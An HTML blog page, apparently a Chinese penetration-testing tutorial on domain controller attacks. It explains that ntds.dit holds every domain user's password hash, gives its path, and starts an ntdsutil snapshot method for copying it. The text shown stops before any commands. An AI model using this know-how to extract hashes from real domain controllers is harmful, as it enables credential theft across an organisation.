

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://avatars.githubusercontent.com/u/193379203?s=400&amp;u=0b52982067f8b5c236021fc6ebd137770c8942d9&amp;v=4">
  <link rel="icon" href="https://avatars.githubusercontent.com/u/193379203?s=400&amp;u=0b52982067f8b5c236021fc6ebd137770c8942d9&amp;v=4">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="域控安全与跨域攻击ntds.dit文件的介绍Ntds.dit介绍ntds.dit为ad的数据库，内容有域用户、域组、用户hash等信息，域控上的ntds.dit只有可以登录到域  控的用户（如域管用户、DC本地管理员用户）可以访问。ntds.dit包括三个主要表：数据表、链接表、  sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash，它和  SAM文">
<meta property="og:type" content="article">
<meta property="og:title" content="域控安全与跨域攻击">
<meta property="og:url" content="http://example.com/2025/01/06/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="域控安全与跨域攻击ntds.dit文件的介绍Ntds.dit介绍ntds.dit为ad的数据库，内容有域用户、域组、用户hash等信息，域控上的ntds.dit只有可以登录到域  控的用户（如域管用户、DC本地管理员用户）可以访问。ntds.dit包括三个主要表：数据表、链接表、  sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash，它和  SAM文">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649894.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649904.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649907.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649910.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649909.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649915.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649202.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649216.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649226.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649235.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649250.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649273.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649463.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649479.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649531.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649542.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649553.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649605.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649725.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649782.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649795.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649920.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649938.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649971.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649018.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649097.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649174.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649329.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649358.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649391.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649414.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649452.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649638.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649647.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649660.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649694.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649717.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649832.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649913.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649937.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649949.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649970.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649999.png">
<meta property="og:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649081.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711514712434-a3becd49-b4e8-4e80-bfb8-3e059f7aa445.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711514759655-933d9364-004d-4244-92de-d156ac564d34.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382542996-ada79f4b-2fdd-4d64-a7a0-3055f5c38b98.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711515190381-7a78562d-469b-4876-8ece-bd45a19f7c51.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382922004-0e39beba-bb5e-416a-817c-229d29ed420b.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382931194-5b56a418-39bd-435f-8368-deddf5f32e68.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709382893047-dd43891f-0dc0-4841-9096-ef310ec9bed0.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711520740381-c24e0890-9a85-446f-9f8b-6254f4920d53.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711520778318-f8e195e1-054e-426e-98e9-3028fce8d5e2.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383018857-77929894-c396-43c1-8a70-07fbb21a1080.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383223302-dcf12b4e-ea26-43b9-a303-d1fc8ac7050d.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383231030-6b2e03d1-a3a4-4c7f-b505-62255dd8d19a.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383249321-309e387a-a95c-4ba9-86be-9620f47fc080.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711521479559-b0000688-03db-4162-ad01-c5cb2b30e5e0.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711521586816-78cb3632-6a16-4328-8277-dde9b44ec55e.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711521832627-78e9ea8c-8345-489a-a031-cb9ca65372f2.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711524429877-2eec625a-a3e1-4bf7-ae79-4dda69433257.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711524600944-fdcbd5eb-3553-46c9-82d3-48c9763ee972.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711524664400-29b5ea77-b0a1-4dbd-b8c2-57964e253c8a.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711539904599-d399dae2-f62d-4b9c-8af4-73d33cfd086d.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711539924849-d7d4c409-c3dd-4a05-a01b-c08d70ec1ec1.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711541133744-63dd01b2-727b-460b-a794-3e8c589bfbf8.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383782024-aa778b1d-197b-46ac-9b0d-553c7e623151.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711525041860-2c5e66e1-34ef-4a86-aeab-8d5478a75117.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383882371-125bb49e-b737-4a18-98ce-4ec6327f1693.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383899546-d14d96ee-5327-4ab8-8379-dd7d47b54f9c.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383917111-9c30f67b-f831-460e-b2cd-f41e38a2b837.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709383930918-cbbc564e-88ac-4dfe-b827-f67e465a1355.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709384319650-f3fe4166-7777-44a6-9628-6bcca004d250.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709384329428-fd4365e2-6bb9-46a3-8659-9f3293d34c01.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1709384346896-9fd64334-13ae-41ab-9cfc-b4b12722d712.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711553072070-981d078b-271a-4226-882a-03d031a0f4ac.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552382462-a292d45b-a0a9-4f29-bec7-26ecd7eecf21.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711549702370-5390e4ab-9434-49d2-89c4-8254f045bb59.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552684805-53a920bf-1496-4294-84a9-5784f03021b6.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552817027-4e659294-d7b1-4ced-a3a1-6ad1a20e01c1.png">
<meta property="og:image" content="http://example.com/%E7%AC%94%E8%AE%B0/%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552881707-08dc1b84-89ba-48e1-8eab-32ee2e290a2e.png">
<meta property="og:image" content="http://example.com/%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E4%B8%8E%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB.assets/1711552926596-7787c5d4-2187-4969-ae1d-d7bf1e314482.png">
<meta property="article:published_time" content="2025-01-06T08:49:16.000Z">
<meta property="article:modified_time" content="2025-01-06T08:49:26.541Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649894.png">
  
  
  
  <title>域控安全与跨域攻击 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>SLL779</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="域控安全与跨域攻击"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-01-06 16:49" pubdate>
          2025年1月6日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          46 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">域控安全与跨域攻击</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="域控安全与跨域攻击"><a href="#域控安全与跨域攻击" class="headerlink" title="域控安全与跨域攻击"></a>域控安全与跨域攻击</h1><h2 id="ntds-dit文件的介绍"><a href="#ntds-dit文件的介绍" class="headerlink" title="ntds.dit文件的介绍"></a>ntds.dit文件的介绍</h2><h3 id="Ntds-dit介绍"><a href="#Ntds-dit介绍" class="headerlink" title="Ntds.dit介绍"></a>Ntds.dit介绍</h3><p>ntds.dit为ad的数据库，内容有域用户、域组、用户hash等信息，域控上的ntds.dit只有可以登录到域 </p>
<p>控的用户（如域管用户、DC本地管理员用户）可以访问。ntds.dit包括三个主要表：数据表、链接表、 </p>
<p>sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash，它和 </p>
<p>SAM文件一样，被windows系统锁死 </p>
<h3 id="Ntds-dit位置"><a href="#Ntds-dit位置" class="headerlink" title="Ntds.dit位置"></a>Ntds.dit位置</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">C:\Windows\NTDS<br></code></pre></td></tr></table></figure>

<p><img src="https://hsmyzj-1322074094.cos.ap-beijing.myqcloud.com/202501061649894.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="多种方式提取和移动ntds-dit文件"><a href="#多种方式提取和移动ntds-dit文件" class="headerlink" title="多种方式提取和移动ntds.dit文件"></a>多种方式提取和移动ntds.dit文件</h2><h3 id="ntdsutils-exe提取ntds-dit"><a href="#ntdsutils-exe提取ntds-dit" class="headerlink" title="ntdsutils.exe提取ntds.dit"></a>ntdsutils.exe提取ntds.dit</h3><p>ntdsutils.exe是一个为活动目录提供管理机制的命令行工具，使用 ntdsutils.exe可以维护和管理 活动目录数据库、控制单个主机操作、创建应用程序目录分区等，该工具默认安装在域控服务器上，可 以在域控制器上直接操作，支持windows server 2003、2008、2012。提取过程分为3步：</p>
<p>第一步：创建快照</p>
<p>可以看到快照的uid是738aac0f-ee3c-4da1-993a-c6b8f3868120</p>
